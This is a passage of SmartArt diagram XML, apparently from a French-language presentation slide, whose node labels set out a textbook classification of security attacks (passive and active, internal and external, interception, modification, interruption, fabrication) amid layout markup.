        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{59A7D002-5B36-40DE-B08D-6E8B37B12ED9}" type="sibTrans" cxnId="{4B69C92E-182B-49C8-B470-0DEF4AE32AAA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3BBCFFD-6722-4133-8CB0-5B45A4980D56}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Passive </a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5038FA15-DE83-4967-B38F-3FF28E9564F3}" type="parTrans" cxnId="{A7ED4B28-BD60-4C7E-903F-B39C66D16AA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2EA94DA6-97D9-45EE-B439-18887418A6BA}" type="sibTrans" cxnId="{A7ED4B28-BD60-4C7E-903F-B39C66D16AA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3EC5114F-D813-4B8F-B191-F71EE84BA999}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Selon l’objectif visé</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AAA12AB5-BB45-4EB2-BFE9-E68DDAF83C71}" type="parTrans" cxnId="{E50C6E77-B4A5-414B-BC05-8687E5190DDF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{375154AC-5601-4E16-A2FB-E151BAAE18A6}" type="sibTrans" cxnId="{E50C6E77-B4A5-414B-BC05-8687E5190DDF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A87B5F2-2588-4071-89D7-71B58A4E3917}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Interception </a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D595BB2-B457-4255-98B1-215B88F5587D}" type="parTrans" cxnId="{F6655FD7-9824-4C0C-9EBA-4F655DAFBD34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78FD434C-D784-4BBB-B584-C95280C1BEEE}" type="sibTrans" cxnId="{F6655FD7-9824-4C0C-9EBA-4F655DAFBD34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6E32F2FF-0A4F-4DAC-A867-372AC1FFDCCE}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Interne </a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D55A1B6-29D7-4F4F-987E-A07A710AB66C}" type="parTrans" cxnId="{1ED8AF9E-6DFD-489F-8387-793A1B1E29ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6323B111-BF5B-438A-B307-56D6BCE1CAD5}" type="sibTrans" cxnId="{1ED8AF9E-6DFD-489F-8387-793A1B1E29ED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BCEF0BD-EEEE-488F-B0DC-8A8AD7329074}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Externe</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D178B54-5B55-4B5F-8945-C655A7FDED50}" type="parTrans" cxnId="{39A20A1C-4A74-4763-A39E-D98716AB8EAA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA459BF3-E289-487B-8824-0C8A4F2A3201}" type="sibTrans" cxnId="{39A20A1C-4A74-4763-A39E-D98716AB8EAA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F03616A-40BF-40D1-B964-551E5AE474C1}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Active </a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1EFC620-2C51-4869-9089-7A91050DAC26}" type="parTrans" cxnId="{558EC490-5E28-4DE8-B82A-A009A090703E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B1493129-3F24-4F6A-ADDC-014984D6CEA8}" type="sibTrans" cxnId="{558EC490-5E28-4DE8-B82A-A009A090703E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{876E1355-6907-4A35-8E83-B518546CFB32}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Modification </a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92B39FBF-B27F-4714-AEBA-E08E8D7DFCC9}" type="parTrans" cxnId="{EF8D25E1-DBF6-475A-BF3D-47F72B36BDE5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E249F86D-1EBD-4932-ABF7-9435AEB5AA66}" type="sibTrans" cxnId="{EF8D25E1-DBF6-475A-BF3D-47F72B36BDE5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B7F58304-91A8-417D-9052-FB8EB877E403}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Interruption  </a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A51A825-E389-4851-9AF2-D97A4465AB07}" type="parTrans" cxnId="{64CAA720-D6DE-42C6-84E6-6730A5A587DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8D8F600-77EC-4882-9807-9B44577A4FF3}" type="sibTrans" cxnId="{64CAA720-D6DE-42C6-84E6-6730A5A587DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{140E2ADC-91E7-409F-8225-2E6B03F27CF3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Fabrication </a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C754AB20-1A92-48F3-83A0-58A59C6EAE88}" type="parTrans" cxnId="{FC5CA6E5-5949-4FF8-A179-B5654693DA55}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8BE6687A-93DC-40D9-B9CD-CF394F2F5399}" type="sibTrans" cxnId="{FC5CA6E5-5949-4FF8-A179-B5654693DA55}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C69578A2-464F-4D92-842E-FC7A98EFBF15}" type="pres">
      <dgm:prSet presAssocID="{019C1591-B8F4-455C-9C6F-12A39946245B}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chPref val="1"/>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FE8534E-F4D4-4BB4-A2B4-CFFD25D2995B}" type="pres">
      <dgm:prSet presAssocID="{6A4ED6A6-9239-48FF-B31E-E66487BDAA11}" presName="root1" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3639C63A-930B-4ACE-A4B2-A8B3BCE3788D}" type="pres">
      <dgm:prSet presAssocID="{6A4ED6A6-9239-48FF-B31E-E66487BDAA11}" presName="LevelOneTextNode" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06D52A4F-D497-481E-A0D7-1AD342A881BF}" type="pres">
      <dgm:prSet presAssocID="{6A4ED6A6-9239-48FF-B31E-E66487BDAA11}" presName="level2hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87CD2437-3236-4C80-81F1-F0D7CC02BF5F}" type="pres">
      <dgm:prSet presAssocID="{FB70A082-7152-45C4-87AD-BB6D21FDB0DF}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{268FF773-4645-405B-81E7-98317FF49B21}" type="pres">
      <dgm:prSet presAssocID="{FB70A082-7152-45C4-87AD-BB6D21FDB0DF}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9C424BC-FF11-43F9-B87A-69F7023A8785}" type="pres">
      <dgm:prSet presAssocID="{345DD546-641F-47FB-8F0B-4F7A5C06BF84}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60E21240-EDE5-468F-B1CE-20CBA08E568B}" type="pres">
      <dgm:prSet presAssocID="{345DD546-641F-47FB-8F0B-4F7A5C06BF84}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A8C9972-872A-4581-9F65-6BDBE621502A}" type="pres">
      <dgm:prSet presAssocID="{345DD546-641F-47FB-8F0B-4F7A5C06BF84}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9C98F520-D0CA-4859-96D6-BB599C518A5E}" type="pres">
      <dgm:prSet presAssocID="{8D55A1B6-29D7-4F4F-987E-A07A710AB66C}" presName="conn2-1" presStyleLbl="parChTrans1D3" presStyleIdx="0" presStyleCnt="8"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{323E92C9-1061-4D19-A1B4-78A7C0974721}" type="pres">
      <dgm:prSet presAssocID="{8D55A1B6-29D7-4F4F-987E-A07A710AB66C}" presName="connTx" presStyleLbl="parChTrans1D3" presStyleIdx="0" presStyleCnt="8"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6B05952-2CBC-47DF-85EB-1CEB9089FD7A}" type="pres">
      <dgm:prSet presAssocID="{6E32F2FF-0A4F-4DAC-A867-372AC1FFDCCE}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39B833C0-8DAC-4292-B68F-828ACA83B0B2}" type="pres">
      <dgm:prSet presAssocID="{6E32F2FF-0A4F-4DAC-A867-372AC1FFDCCE}" presName="LevelTwoTextNode" presStyleLbl="node3" presStyleIdx="0" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B7FEABE-852D-4B7A-B0B1-53608FD9957D}" type="pres">
      <dgm:prSet presAssocID="{6E32F2FF-0A4F-4DAC-A867-372AC1FFDCCE}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72D05CAE-349D-4513-ADF1-0877ED89C006}" type="pres">
      <dgm:prSet presAssocID="{5D178B54-5B55-4B5F-8945-C655A7FDED50}" presName="conn2-1" presStyleLbl="parChTrans1D3" presStyleIdx="1" presStyleCnt="8"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3B69F59A-3401-457B-8C4B-BA8EE2573FAD}" type="pres">
      <dgm:prSet presAssocID="{5D178B54-5B55-4B5F-8945-C655A7FDED50}" presName="connTx" presStyleLbl="parChTrans1D3" presStyleIdx="1" presStyleCnt="8"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6DDE658F-FAFB-4728-AE59-F8F4704B72F4}" type="pres">
      <dgm:prSet presAssocID="{7BCEF0BD-EEEE-488F-B0DC-8A8AD7329074}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4E21182C-2A07-43D8-BF24-9FC007E0A7DD}" type="pres">
      <dgm:prSet presAssocID="{7BCEF0BD-EEEE-488F-B0DC-8A8AD7329074}" presName="LevelTwoTextNode" presStyleLbl="node3" presStyleIdx="1" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E6498EB3-5D97-4315-8776-D9F744EDB3EA}" type="pres">
      <dgm:prSet presAssocID="{7BCEF0BD-EEEE-488F-B0DC-8A8AD7329074}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{800C0953-6094-4FFF-AE03-4C61A5DA815B}" type="pres">
      <dgm:prSet presAssocID="{65F188DC-9F04-4411-BDCB-488D5741332E}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{972DE7E3-DF64-4150-B8EC-1C8E819945D6}" type="pres">
      <dgm:prSet presAssocID="{65F188DC-9F04-4411-BDCB-488D5741332E}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A723D8CC-731E-418C-9278-CC1A041C8C5D}" type="pres">
      <dgm:prSet presAssocID="{1F58FD89-9BCF-4061-A9B1-F9B7151A72E2}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{801626B0-1DDD-43D6-82B8-A1A7985583FB}" type="pres">
      <dgm:prSet presAssocID="{1F58FD89-9BCF-4061-A9B1-F9B7151A72E2}" presName="LevelTwoTextNode" presStyleLbl="node2" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F54B708-7505-4546-ADFE-B8B923F89349}" type="pres">
      <dgm:prSet presAssocID="{1F58FD89-9BCF-4061-A9B1-F9B7151A72E2}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FB08058-D565-45FF-A46B-1F12D295D485}" type="pres">
      <dgm:prSet presAssocID="{5038FA15-DE83-4967-B38F-3FF28E9564F3}" presName="conn2-1" presStyleLbl="parChTrans1D3" presStyleIdx="2" presStyleCnt="8"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D8C95C1-77F1-47F9-AFBF-6B6929575789}" type="pres">
      <dgm:prSet presAssocID="{5038FA15-DE83-4967-B38F-3FF28E9564F3}" presName="connTx" presStyleLbl="parChTrans1D3" presStyleIdx="2" presStyleCnt="8"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A9A116F-0FEC-4E4C-8DD4-C79278D9B4B5}" type="pres">
      <dgm:prSet presAssocID="{C3BBCFFD-6722-4133-8CB0-5B45A4980D56}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72AE7ECC-E249-47FC-B67B-69C5DD38F331}" type="pres">
      <dgm:prSet presAssocID="{C3BBCFFD-6722-4133-8CB0-5B45A4980D56}" presName="LevelTwoTextNode" presStyleLbl="node3" presStyleIdx="2" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2D4D347-7120-47D1-8952-1F5AB6DCB7FF}" type="pres">
      <dgm:prSet presAssocID="{C3BBCFFD-6722-4133-8CB0-5B45A4980D56}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F78E98D0-9AEA-461A-B576-E0E86737B03B}" type="pres">
      <dgm:prSet presAssocID="{D1EFC620-2C51-4869-9089-7A91050DAC26}" presName="conn2-1" presStyleLbl="parChTrans1D3" presStyleIdx="3" presStyleCnt="8"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{313FAE70-2D2D-4402-AF76-9CB968DC3217}" type="pres">
      <dgm:prSet presAssocID="{D1EFC620-2C51-4869-9089-7A91050DAC26}" presName="connTx" presStyleLbl="parChTrans1D3" presStyleIdx="3" presStyleCnt="8"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8B5DB158-9EBB-4787-907D-12D451FE6D46}" type="pres">
      <dgm:prSet presAssocID="{4F03616A-40BF-40D1-B964-551E5AE474C1}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87971206-1DAA-4D32-9AA8-FFE6B5435848}" type="pres">
      <dgm:prSet presAssocID="{4F03616A-40BF-40D1-B964-551E5AE474C1}" presName="LevelTwoTextNode" presStyleLbl="node3" presStyleIdx="3" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B008FCA-ABEC-4BE0-B437-7478E6B8FB9F}" type="pres">
      <dgm:prSet presAssocID="{4F03616A-40BF-40D1-B964-551E5AE474C1}" presName="level3hierChild" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC45DACC-9997-4FA2-A187-A38DE77EBC39}" type="pres">
      <dgm:prSet presAssocID="{AAA12AB5-BB45-4EB2-BFE9-E68DDAF83C71}" presName="conn2-1" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E57FBB68-EAC8-4FCA-B9A8-38DD62F630CF}" type="pres">
      <dgm:prSet presAssocID="{AAA12AB5-BB45-4EB2-BFE9-E68DDAF83C71}" presName="connTx" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02E02562-AD91-4C52-93E1-CC6F3AA07384}" type="pres">
      <dgm:prSet presAssocID="{3EC5114F-D813-4B8F-B191-F71EE84BA999}" presName="root2" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C925222-85D9-4FA0-970F-FA2CE89785D6}" type="pres">
